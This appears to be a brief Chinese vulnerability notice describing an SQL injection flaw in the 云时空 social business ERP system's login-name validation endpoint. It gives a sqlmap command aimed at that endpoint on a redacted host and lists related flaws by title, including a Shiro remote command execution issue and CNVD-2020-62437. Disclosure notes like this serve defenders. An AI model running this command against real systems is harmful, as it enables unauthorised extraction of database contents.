云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
登录页面
使用SQLmap验证漏洞
sqlmap -u "http://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin"
云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437